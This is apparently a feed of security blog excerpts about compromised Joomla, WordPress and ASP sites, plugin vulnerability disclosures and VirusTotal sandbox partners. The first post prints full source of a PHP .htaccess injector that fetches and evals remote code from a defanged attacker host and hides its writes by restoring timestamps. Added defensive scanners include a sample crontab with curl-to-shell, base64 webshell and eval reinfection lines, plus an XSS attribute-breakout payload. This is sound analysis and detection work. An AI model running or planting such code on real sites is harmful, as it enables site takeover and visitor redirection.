.htaccess Injector on Joomla and WordPress Websites

During the process of investigating one of our incident response cases, we found an .htaccess code injection. It had spread across the whole website, injected into every .htaccess file, and was redirecting visitors to the http[:]//portal-f[.]pw/XcTyTp advertisement website.

Taking a Look at the .htaccess Injector Code

Below is the code within the ./modules/mod_widgetread_twitt/index.php file on a Joomla website. This code is responsible for injecting the malicious redirects into the .htaccess files:

<?php
echo 'Wordpress ';
// The following block is repeated six times in the sample, once for each of
// ./, ../, ../../, ../../../, ../../../../ and ../../../../../ (only $fl changes).
// URLs are defanged. $path and $page are never defined anywhere in the sample.
$htac=file_get_contents('hXXp://recaptcha-in[.]pw/bash/x');   // remote payload to prepend
$fl="./.htaccess";
$lastData="";
if(file_exists($fl))$lastData=file_get_contents($fl);
if(!substr_count($lastData,"# BEGIN WORDPRESS")){            // re-injection guard: the payload carries this marker
    $data=$htac."\r\n".$lastData;                            // payload first, the original rules after it
    chmod($fl,0766);
    file_put_contents($fl,$data);
    touch($fl,filemtime($path));                             // tries to hide the write by resetting the mtime
    chmod($fl,0444);                                         // leaves the file read-only
    echo$page;
};
$htac=file_get_contents('hXXp://recaptcha-in[.]pw/bash/x');$fl="../.htaccess";$lastData="";if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,"# BEGIN WORDPRESS")){$data=$htac."\r\n".$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};
$htac=file_get_contents('hXXp://recaptcha-in[.]pw/bash/x');$fl="../../.htaccess";$lastData="";if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,"# BEGIN WORDPRESS")){$data=$htac."\r\n".$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};
$htac=file_get_contents('hXXp://recaptcha-in[.]pw/bash/x');$fl="../../../.htaccess";$lastData="";if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,"# BEGIN WORDPRESS")){$data=$htac."\r\n".$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};
$htac=file_get_contents('hXXp://recaptcha-in[.]pw/bash/x');$fl="../../../../.htaccess";$lastData="";if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,"# BEGIN WORDPRESS")){$data=$htac."\r\n".$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};
$htac=file_get_contents('hXXp://recaptcha-in[.]pw/bash/x');$fl="../../../../../.htaccess";$lastData="";if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,"# BEGIN WORDPRESS")){$data=$htac."\r\n".$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};
echo ' ';
eval(file_get_contents('hXXp://recaptcha-in[.]pw/bash/include/xtaccess'));   // second stage, fetched and executed straight from the attacker's server
echo ' ';
set_time_limit(120);
$fileName=".htaccess";
$injectData="hXXp://recaptcha-in[.]pw/bash/x";
$filesArray=array();
// Recursively collect every file named $searchFile below $dir.
function FindFiles($dir,&$fArray,&$searchFile){
    if($curdir=opendir($dir)){
        while(false!==($file=readdir($curdir))){
            if(($file==".")||($file=="..")) continue;
            $filePath=$dir.DIRECTORY_SEPARATOR.$file;
            if(is_file($filePath)) if($file!=$searchFile) continue;
            if(is_dir($filePath)){ FindFiles($filePath,$fArray,$searchFile); }
            else{ array_push($fArray,$filePath); }
        }
        closedir($curdir);
    }
    return true;
}
FindFiles($_SERVER["DOCUMENT_ROOT"],$filesArray,$fileName);   // walk the entire document root
if(count($filesArray)>0){
    $injectData=file_get_contents($injectData);
    if(!empty($injectData)){
        foreach($filesArray as &$value){
            chmod($value,0777);
            if(is_writable($value)){
                $fileDate=filemtime($value);                  // remember the original mtime ...
                $fileSource=file_get_contents($value);
                if(!strstr($fileSource,$injectData)){         // skip files that already carry the payload
                    $fileSource=$injectData."\r\n".$fileSource;
                    file_put_contents($value,$fileSource);
                    touch($value,$fileDate);                  // ... and restore it so mtime-based checks see nothing
                }
            }
            chmod($value,0444);                               // leave every file read-only
        }
    }
};
echo '
END';

This code first targets the .htaccess files up to five directories above the infected module, then recursively searches the whole document root for every .htaccess file and prepends the remote payload to each one, restoring the original modification time and leaving the file read-only afterwards.
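As an added example (not code from the original post), here is a content-based scanner for the injection described above. It walks a document root the same way the injector does and flags any .htaccess that carries the injector's re-injection marker, redirects to one of the domains named in the post, or has been left mode 0444. The marker string is inferred from the injector's own case-sensitive substr_count() check (legitimate WordPress writes "# BEGIN WordPress" in mixed case); the redirect payload itself is not shown in the post, so the sample site the script builds is constructed.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Indicators taken from the incident above. The payload body is not shown in
# the post; the marker is what the injector checks for before writing, and
# portal-f.pw is the redirect destination named in the post.
MARKER = "# BEGIN WORDPRESS"
SUSPECT_HOSTS = ("portal-f.pw", "recaptcha-in.pw")
REDIRECT_RE = re.compile(
    r"^\s*(?:RewriteRule|Redirect(?:Match)?)\b.*?https?://([^\s/]+)", re.I | re.M)


def find_htaccess(root):
    """Every .htaccess below root, walked the same way the injector walks DOCUMENT_ROOT."""
    return sorted(str(p) for p in Path(root).rglob(".htaccess"))


def classify(path):
    """Content-based findings for one .htaccess. mtime is deliberately not used:
    the injector calls touch($file, $originalMtime) after writing, so
    'find -newer' style triage misses these files."""
    findings = []
    text = Path(path).read_text(errors="replace")
    if MARKER in text:
        findings.append("injector-marker")
    for m in REDIRECT_RE.finditer(text):
        host = m.group(1).lower()
        if any(host == h or host.endswith("." + h) for h in SUSPECT_HOSTS):
            findings.append("redirect:" + host)
    if stat.S_IMODE(os.stat(path).st_mode) == 0o444:
        findings.append("mode-0444")   # the injector ends with chmod($file, 0444)
    return findings


def scan(root):
    """Map of path -> findings for every .htaccess that triggered at least one indicator."""
    return {p: f for p in find_htaccess(root) if (f := classify(p))}


def build_sample():
    """Constructed document root: one clean WordPress .htaccess and one injected copy."""
    root = tempfile.mkdtemp(prefix="docroot-")
    clean = ("# BEGIN WordPress\nRewriteEngine On\n"
             "RewriteRule ^index\\.php$ - [L]\n# END WordPress\n")
    # Constructed stand-in for the fetched payload: marker plus redirect.
    payload = (MARKER + "\nRewriteEngine On\n"
               "RewriteRule .* http://portal-f.pw/XcTyTp [R=302,L]\n# END WORDPRESS")
    (Path(root) / "wp-admin").mkdir()
    (Path(root) / "wp-admin" / ".htaccess").write_text(clean)
    injected = Path(root) / ".htaccess"
    injected.write_text(payload + "\r\n" + clean)   # payload . "\r\n" . existing rules, as the injector does
    injected.chmod(0o444)
    return root


if __name__ == "__main__":
    for path, findings in scan(build_sample()).items():
        print(path, findings)
```

Because the injector restores each file's mtime, timestamp-based triage will not surface these files; hashing or pattern-matching the contents, as here, does. Once the files are identified, restore them from a known-good copy rather than trying to cut the payload out, and remove the dropper (the module file above) first or the next request will re-inject everything.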

Continue reading .htaccess Injector on Joomla and WordPress Websites at Sucuri Blog.

Source: Scuri check

Slimstat: Stored XSS from Visitors

The WordPress Slimstat plugin, which currently has over 100k installs, gathers analytics data for a WordPress website. It tracks information such as browser and operating system details and page visits so that the site owner can optimize the site.

Versions below 4.8.1 are affected by an unauthenticated stored XSS on the administrator dashboard.

Timeline

  • 2019/05/16: Initial disclosure
  • 2019/05/20: Patch released (4.8.1)
  • 2019/05/21: Blog post released

Details

This vulnerability allows a visitor to inject arbitrary JavaScript code into the plugin's access log functionality, which is visible both on the plugin's access log page and on the admin dashboard index, the default page shown once you log in.

Continue reading Slimstat: Stored XSS from Visitors at Sucuri Blog.

Source: Scuri check

W97M/Downloader Malware Dropper Served from Compromised Websites

W97M/Downloader is part of a large banking malware operation that peaked in March 2016. Bad actors have been distributing this campaign for well over a year; it serves as a doorway to the Vawtrak and Dridex banking trojans. The campaign profiles each victim's operating system and browser in order to deliver the appropriate payload.

W97M/Downloader Malware Campaign

W97M/Downloader is a specially-crafted Microsoft Word document that, when opened, silently executes a malicious macro that connects to multiple remote servers to download and display additional components.

Continue reading W97M/Downloader Malware Dropper Served from Compromised Websites at Sucuri Blog.

Source: Scuri check

Who is Responsible for the Security of Your Website?

On a daily basis at Sucuri, we hear things like:

“My host takes care of my website security.”

“I have never been hacked, so why should I care?”

Or here’s a personal favorite:

“I’ll take care of it if (when) it happens.”

Let’s be honest, no one wants to think about the possibility of their site being hacked.

I have been in the website security industry for a few years now and have seen so many horror stories it’s unreal.

Continue reading Who is Responsible for the Security of Your Website? at Sucuri Blog.

Source: Scuri check

Persistent Cross-site Scripting in WP Live Chat Support Plugin

During routine research audits for our Sucuri Firewall, we discovered an Unauthenticated Persistent Cross-Site Scripting (XSS) vulnerability affecting 60,000+ users of the WP Live Chat Support WordPress plugin.

Current State of the Vulnerability

This security bug has been fixed in the 8.0.27 release. On unpatched sites it can be exploited by an attacker who has no account on the vulnerable site.

We are not aware of any exploit attempts currently using this vulnerability.

Continue reading Persistent Cross-site Scripting in WP Live Chat Support Plugin at Sucuri Blog.

Source: Scuri check

WordPress Plugin Give – Stored XSS for Donors

Give is a WordPress plugin which allows users to set up a donation page on a website. It currently has 60k installs.

During a recent audit of the plugin, we found a severe vulnerability which allows donors to inject arbitrary code on an administrative page.

If you are using a version lower than 2.4.7, you should update immediately.

When creating a donation, all of the arguments are sanitized as text fields, but this method does not take into consideration where the variables are reflected.
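The Give bug above, like the Slimstat and WP Live Chat Support issues earlier on this page, comes from sanitizing a value once on input and then reflecting it into an HTML context the sanitizer never considered. The following Python illustration is added here and does not use or model WordPress's own functions: a tag-stripping "text field" sanitizer passes a quote-and-event-handler payload through untouched, which is harmless in an element body but becomes executable inside a quoted attribute unless the value is escaped for that context at output time. The donor names are constructed.

```python
import html
import re

TAG_RE = re.compile(r"<[^>]*>")


def sanitize_text_field(value):
    """Stand-in for a 'text field' sanitizer (modelled on the behaviour the post
    describes, not WordPress's function): strips tags and collapses whitespace,
    but knows nothing about the HTML context the value will end up in."""
    return " ".join(TAG_RE.sub("", value).split())


def render_unsafe(donor_name):
    """Admin-page widget that trusts the sanitized value inside an attribute."""
    return f'<input type="text" name="donor" value="{donor_name}">'


def render_safe(donor_name):
    """Same widget, escaped for the attribute context at the point of output."""
    return f'<input type="text" name="donor" value="{html.escape(donor_name, quote=True)}">'


def render_text_safe(donor_name):
    """Element-body context: escaping < > & is what matters here."""
    return f"<p>Latest donor: {html.escape(donor_name, quote=False)}</p>"


ATTR_BREAKOUT = re.compile(r'"\s+on\w+\s*=', re.I)


def attribute_breakout(markup):
    """True when a value has closed its quoted attribute and started an on* handler."""
    return bool(ATTR_BREAKOUT.search(markup))


# Constructed donor names for this example.
TAGGED = "Ann<script>alert(1)</script>"             # tag stripping neutralises this one
BREAKOUT = 'Ann" onfocus="alert(1)" autofocus="'    # no tags, so it passes the sanitizer intact


if __name__ == "__main__":
    for name in (TAGGED, BREAKOUT):
        clean = sanitize_text_field(name)
        print("sanitized :", clean)
        print("unsafe    :", render_unsafe(clean), "-> breakout" if attribute_breakout(render_unsafe(clean)) else "")
        print("safe      :", render_safe(clean))
        print("text      :", render_text_safe(clean))
```

The point is that input sanitization chooses one context in advance, while the same donor name may be printed into an attribute, an element body, a JavaScript string or a URL; each of those needs its own escaping applied where the value is written out.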

Continue reading WordPress Plugin Give – Stored XSS for Donors at Sucuri Blog.

Source: Scuri check

VirusTotal += SecureAge

We welcome SecureAge APEX scanner to VirusTotal. In the words of the company:

“SecureAge APEX is an anti-malware scanning engine powered by artificial intelligence, designed to extend the detection capabilities of the SecureAge SecureAPlus endpoint protection platform (EPP). The APEX engine provides next-generation endpoint detection as part of the SecureAPlus layered approach to security which includes Application Control & Application Whitelisting, multi-cloud anti-virus, fileless attack protection and more. To deal with advanced threats like zero-day malware, the APEX engine goes beyond traditional scanners by reliably identifying unseen and mutated malware types and variants from day one of their release. The APEX engine that runs in VirusTotal targets Windows PE files; with integration into the VirusTotal ecosystem, SecureAge looks forward to further enhancing APEX’s capabilities, and above that, adding value to VirusTotal’s cybersecurity services.”

SecureAge has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by AV-Comparatives, an AMTSO-member tester.
Source: VirusTotal

Multiple Vulnerabilities in the WordPress Ultimate Member Plugin

The Ultimate Member plugin, version 2.0.45 and lower, is affected by multiple vulnerabilities, among them a critical one that allows malicious users to read and delete your wp-config.php file, which can lead to a complete website takeover.

All of our clients behind our website firewall are already protected, and are not at risk.

The three vulnerabilities have the following DREAD score:

  • Arbitrary file read and delete: 8.4
  • Admin dashboard XSS: 7.4
  • User Profile XSS: 6.8

Disclosure / Response Timeline:

  • 2019/05/07: Initial disclosure
  • 2019/05/08: Partial patch released (2.0.45)
  • 2019/05/10: Complete patch released (2.0.46)

File Leak and Delete

If an admin added a File upload or Image upload input field to one of the forms (such as the user profile), a user can abuse it to download any file on the server.
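The post does not show the vulnerable handler. Assuming, as the description suggests, that it resolves a user-supplied file name relative to the plugin's upload directory, the check that should have been there is path confinement: resolve the requested name against the upload directory and refuse anything that ends up outside it. The Python below is an added example, not the plugin's code; it applies that check to both read and delete, and also catches a planted symlink, which a naive ".." filter would miss. The directory layout and file names are constructed.

```python
import os
import tempfile
from pathlib import Path


def resolve_upload(upload_dir, requested):
    """Absolute path for `requested` inside upload_dir, or None if it escapes.
    resolve() collapses '..' and follows symlinks before the containment check,
    so traversal, absolute paths and planted symlinks are all rejected."""
    base = Path(upload_dir).resolve()
    target = (base / requested).resolve()   # an absolute `requested` replaces base here and is caught below
    try:
        target.relative_to(base)
    except ValueError:
        return None
    return str(target)


def read_upload(upload_dir, requested):
    path = resolve_upload(upload_dir, requested)
    if path is None or not os.path.isfile(path):
        return None
    return Path(path).read_bytes()


def delete_upload(upload_dir, requested):
    """Delete only a regular file confined to upload_dir; False otherwise."""
    path = resolve_upload(upload_dir, requested)
    if path is None or not os.path.isfile(path):
        return False
    os.remove(path)
    return True


def build_demo():
    """Constructed layout: a fake site root holding wp-config.php, and an uploads
    directory with one image and one attacker-planted symlink back to wp-config.php."""
    site = Path(tempfile.mkdtemp(prefix="site-"))
    (site / "wp-config.php").write_text("<?php define('DB_PASSWORD', 'secret');")
    uploads = site / "wp-content" / "uploads" / "profile"
    uploads.mkdir(parents=True)
    (uploads / "avatar.png").write_bytes(b"\x89PNG...")
    os.symlink(site / "wp-config.php", uploads / "link.png")
    return str(site), str(uploads)


def run_demo():
    """Exercise the confinement check against the constructed layout."""
    site, uploads = build_demo()
    return {
        "legit_read": read_upload(uploads, "avatar.png"),
        "traversal": resolve_upload(uploads, "../../../wp-config.php"),
        "absolute": resolve_upload(uploads, "/etc/passwd"),
        "symlink": resolve_upload(uploads, "link.png"),
        "traversal_delete": delete_upload(uploads, "../../../wp-config.php"),
        "config_intact": (Path(site) / "wp-config.php").is_file(),
    }


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k:17} {v!r}")
```

Note that the check runs on the resolved path, not on the string the user sent: rejecting ".." in the input would still let a symlink inside the upload directory point at wp-config.php, and URL-decoding or Unicode normalization upstream can turn an innocent-looking string into a traversal.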

Continue reading Multiple Vulnerabilities in the WordPress Ultimate Member Plugin at Sucuri Blog.

Source: Scuri check

New Guide on the Sucuri Referral Program

Referral programs and affiliate marketing opportunities can be found on many web-based company sites, but they are often overlooked. People commonly consider these programs something they "should leave to the professionals".

We designed our new Referral Program Guide to give clear insight into affiliate marketing for both beginners and long-term affiliates. You don't need to be an affiliate pro. We treat every member of our program the same, whether you refer hundreds of customers per month or one per year.

Continue reading New Guide on the Sucuri Referral Program at Sucuri Blog.

Source: Scuri check

Free Website Security Consultation for GoDaddy Pros

Sucuri is partnering with GoDaddy Pro to make the internet more secure, one website professional at a time. Developers, designers, agencies, and freelancers now have an exclusive avenue to level up their security knowledge and differentiate their businesses from the competition.

GoDaddy Pro helps web developers and designers save time and money while managing multiple websites. The free membership includes extensive training materials, automation of routine maintenance tasks, and consolidated client management tools.

Continue reading Free Website Security Consultation for GoDaddy Pros at Sucuri Blog.

Source: Scuri check

VirusTotal MultiSandbox += Yoroi: Yomi sandbox

We are excited to welcome Yomi: The Malware Hunter from Yoroi to the multisandbox project. This brings VirusTotal up to seven integrated sandboxes, in addition to VT's own sandboxes for Windows, macOS, and Android.

In their own words:

Yomi engine implements a multi-analysis approach able to exploit both static analysis and behavioral analysis, providing an ad hoc analysis path for each kind of file. The static analysis section includes document and macro code extraction, imports, dependencies and trust chain analysis. The behavioral detection engine is weaponized to recognize suspicious actions the malware silently does, giving a powerful insight on command and control, exfiltration and lateral movement activities over the network, including encrypted channels. Each analysis is reported in an intuitive aggregated view to spot interesting patterns at a glance.

Some recent samples on VirusTotal with reports from Yoroi:

To see the full details click on the “Full report” within the behavior tab.


Interesting features


Executed commands
Within the Yomi Hunter report, additional information on executed commands can be seen. In this case, we see obfuscated PowerShell commands being run.

To search other behaviour reports for the string “zgohmskxd” we can use the behavior_processes:zgohmskxd search query to find another sample with the same variable name. Check out the other search modifiers that can be used to find similar samples.


Mutexes

Within the Additional information tab, we can also find the mutexes used by the sample under analysis.


To search other sandbox behavior reports with the same string we can search

behavior:AversSucksForever


Mitre ATT&CK™ tab

On the MITRE ATT&CK™ tab you can see how the specific behaviour is tagged.


Relationships

With the Emotet sample we can see the SMB and HTTP traffic. Next you can click on the relationships tab to see other related IP addresses, domains, URLs and files.


You can visually see these relationships from within VirusTotal Graph:

Source: VirusTotal

Persistent XSS via CSRF in WP Meta and Date Remover

During regular research audits for our Sucuri Firewall (WAF), we discovered a Cross Site Request Forgery (CSRF) leading to a persistent Cross Site Scripting vulnerability affecting 70,000+ users of the WP Meta and Date Remover plugin for WordPress.

Disclosure / Response Timeline:

  • April 30 – Initial contact attempt
  • May 07 – Patch is live

Are You at Risk?

This vulnerability requires some level of social engineering to be exploited.

Continue reading Persistent XSS via CSRF in WP Meta and Date Remover at Sucuri Blog.

Source: Scuri check

VirusTotal Multisandbox += NSFOCUS POMA

We are pleased to announce that the multisandbox project has partnered with NSFOCUS POMA. This brings VirusTotal up to six integrated sandboxes. The NSFOCUS sandbox gives us insight into the behaviour of samples that run on Windows 7 and XP SP3.

In their own words:
NSFOCUS POMA, as an integral part of the NSFOCUS Threat Intelligence (NTI) system, is a cloud‐based malware analysis engine built by the NSFOCUS Security Lab. It can take various types of files and perform both static and dynamic analysis on them to detect potentially malicious behavior, and produce analytic reports in many formats (including STIX). This service can help a user to protect his environment from various threats, such as 0‐day attacks, advanced persistent threats (APTs), ransomware, botnets, cryptocurrency mining and other malware.

We are very honored and proud to bring such value to the VirusTotal users and community.

Here are a few examples:

https://www.virustotal.com/gui/file/a01b10ae6e81c4efc7c4a7b0a6c893907e4a6044b87ed72be7e5800ae104c8c8/behavior/NSFOCUS%20POMA

https://www.virustotal.com/gui/file/d7dd7c2482b3d38cd7fae5860eaa912f019a31fb4988f8320a105c9c4ca5ebbd/behavior/NSFOCUS%20POMA

https://www.virustotal.com/gui/file/430aa2f84cc7934cabdb644eccbdb9d8355899ed9665570bc80b58fd4c010150/behavior/NSFOCUS%20POMA

You can find the sandbox behaviour reports on the behavior tab.

Threat Summary

At the top of the detailed report, right away we can see a summary of the detection.

Threat Detail

Within the threat detail section we can see the behavior in both Windows XP SP3 and Windows 7 SP1 ordered by risk, most important at the top.

Registry actions:

Within the behaviour report we can see an interesting UUID


Using a behavior search in VT Intelligence, we can find other samples that also use this same UUID



Connecting the dots

In the sample we can see the relationship with the IP address 185[.]45[.]252[.]36




Within VTGraph we can visually see the relationships between this sample, the IP address, domains and URLs that we know about


Source: VirusTotal

Replica Spam on Poorly Maintained ASP Site

Although the majority of sites we work on are powered by PHP, we still have clients whose sites use other programming languages.

The other day we cleaned an ASP site where we found a web.config file (the IIS/ASP.NET counterpart of .htaccess) with these instructions. Note that <clear /> discards the server's built-in default-document list and a non-standard view.asp is placed ahead of the usual Default.asp and index.* entries, so a request for a bare directory serves that file first:

<configuration>
   <system.webServer>
       <defaultDocument enabled="true">
           <files>
               <clear />
               <add value="view.asp" />
               <add value="Default.asp" />
               <add value="index.htm" />
               <add value="index.html" />
               <add value="iisstart.htm" />
               <add value="default.aspx" />
               <add value="index.asp" />
               <add value="index.aspx" />
           </files>
       </defaultDocument>

Continue reading Replica Spam on Poorly Maintained ASP Site at Sucuri Blog.

Source: Scuri check

Cronjob Backdoors

Attackers commonly rely on backdoors to easily regain entry and maintain control over a website. They also use PHP functions to extend what those backdoors can do.

A good example of this is the shell_exec function which allows plain shell commands to be run directly through the web application, providing attackers with an increased level of control over the environment.

Backdoor in Cron

While investigating a client with repeated website infections, we came across a scenario where a cron job was being used to reinfect the site.
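An added example (not from the case above) of what to look for when auditing cron entries for reinfection jobs: a small Python audit that parses crontab lines and flags commands that pipe a downloaded file into an interpreter, base64-decode an embedded payload, run an inline php -r eval(), or write into the web root. The crontab it examines is constructed, and /var/www/ as the web root is an assumption.

```python
import base64
import re

# Constructed crontab for this example; the paths and hosts are not from the post.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
15 3 * * * /usr/bin/php /var/www/html/cron.php > /dev/null 2>&1
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://example.invalid/x.txt | sh
*/10 * * * * wget -q -O- http://example.invalid/b.txt | php
* * * * * echo PD9waHAgZXZhbCgkX1BPU1RbJ2MnXSk7 | base64 -d > /var/www/html/wp-content/uploads/.cache.php
@hourly /usr/bin/php -r 'eval(file_get_contents("http://example.invalid/p"));'
"""

# Each rule names a pattern that has no place in a legitimate site job.
# /var/www/ as the web root is an assumption; adjust for the host being audited.
RULES = [
    ("remote-fetch-piped-to-interpreter",
     re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:sh|bash|php|python\d?|perl)\b")),
    ("base64-decoded-payload", re.compile(r"\bbase64\b\s+(?:-d|--decode)\b")),
    ("php-inline-eval", re.compile(r"\bphp\b.*\s-r\s.*\beval\(")),
    ("writes-into-webroot", re.compile(r">{1,2}\s*/var/www/")),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def parse_crontab(text):
    """Yield (line_no, schedule, command); skip comments, blank lines and VAR=value lines."""
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^\w+=", s):
            continue
        if s.startswith("@"):                      # @reboot, @hourly, ...
            sched, _, cmd = s.partition(" ")
        else:
            parts = s.split(None, 5)               # five time fields, then the command
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield n, sched, cmd


def decoded_php(cmd):
    """Try to base64-decode long literal tokens; return the first that is PHP source."""
    for m in B64_TOKEN.finditer(cmd):
        try:
            blob = base64.b64decode(m.group(0), validate=True).decode("utf-8", "replace")
        except ValueError:                         # binascii.Error is a ValueError
            continue
        if "<?php" in blob:
            return blob
    return None


def audit_crontab(text):
    """Return [(line_no, schedule, command, reasons)] for every suspicious job."""
    findings = []
    for n, sched, cmd in parse_crontab(text):
        reasons = [name for name, rx in RULES if rx.search(cmd)]
        php = decoded_php(cmd)
        if php:
            reasons.append("decodes-to-php:" + php)
        if reasons:
            findings.append((n, sched, cmd, reasons))
    return findings


if __name__ == "__main__":
    for n, sched, cmd, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {n}: {sched} {cmd}\n    {reasons}")
```

Run it over every crontab that can execute on the host, not just the web user's: /etc/crontab, /etc/cron.d/*, the cron.hourly/daily directories, and the per-user tabs (crontab -l -u for each account). A job that reinfects the site every few minutes explains why a cleaned site keeps coming back, which is exactly the pattern in the case described above.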

Continue reading Cronjob Backdoors at Sucuri Blog.

Source: Scuri check

How Stolen Ecommerce Data is Sold on the Darknet

We have recently published posts regarding banking malware and some of the ways it uses compromised websites to infect victims' devices (smartphones, computers, POS terminals).

Now let us look into some of the methods that cybercriminals use to monetize stolen information like bank accounts, credit cards, and personal information.

Infected Ecommerce Website to Darknet Markets

It’s important to note that one of the most popular topics discussed among cybercriminals is their opsec (operations security).

Continue reading How Stolen Ecommerce Data is Sold on the Darknet at Sucuri Blog.

Source: Scuri check

Insufficient Privilege Validation in WooCommerce Checkout Manager

Due to the poor handling of a vulnerability disclosure, a new attack vector has appeared for the WooCommerce Checkout Manager WordPress plugin and is affecting over 60,000 sites. If you are using this plugin, we recommend that you update it to version 4.3 immediately.

As we’ve seen some exploit attempts occurring in the wild, we feel it is a good time to describe what the issue is.

Current State of the Vulnerability

This arbitrary file upload vulnerability was made public a few weeks ago and has recently been patched.

Continue reading Insufficient Privilege Validation in WooCommerce Checkout Manager at Sucuri Blog.

Source: Scuri check

Typo 3 Spam Infection

Here at Sucuri most of the malware that we deal with is on CMS platforms like:

  • WordPress,
  • Joomla,
  • Drupal,
  • Magento,
  • and others.

But every now and then we come across something a little different.

Blackhat SEO Infection in Typo3

Just recently, I discovered a website using the Typo3 CMS that had been infected with a blackhat SEO spam infection:

Typo3 CMS

Before I begin, according to websitesetup.org, Typo3 is currently the 8th most widely used CMS platform on the web, so I’m surprised I had never seen an infection with this software before, but it looks like over half a million websites on the web use Typo3.

Continue reading Typo 3 Spam Infection at Sucuri Blog.

Source: Scuri check

Plugins Added to Malicious Campaign

We continue to see an increase in the number of plugins attacked as part of a campaign that has been active for quite a long time. Bad actors have added more vulnerable plugins to inject similar malicious scripts.

Plugins Added to the Attack

  • Download WP Inventory Manager (version <= 1.8.2)
  • WooCommerce User Email Verification (version <= 3.3.0 **Still Not Fixed**)

Attackers are trying to exploit vulnerable versions of these plugins.

Continue reading Plugins Added to Malicious Campaign at Sucuri Blog.

Source: Scuri check

Sucuri’s 10th Anniversary

It feels like yesterday, but it has been 10 years since the domain sucuri.net was registered.

Happy 10th Birthday, Sucuri!

For us, 2009 marks the birth of the brand as it represents the day when the open-source project secured its name. The first Sucuri service was originally called NBIM (Network Based Integrity Monitoring).

Sucuri intended to be an interface for the NBIM project. It allowed anyone to monitor websites for changes in content, WHOIS & DNS.

Continue reading Sucuri’s 10th Anniversary at Sucuri Blog.

Source: Scuri check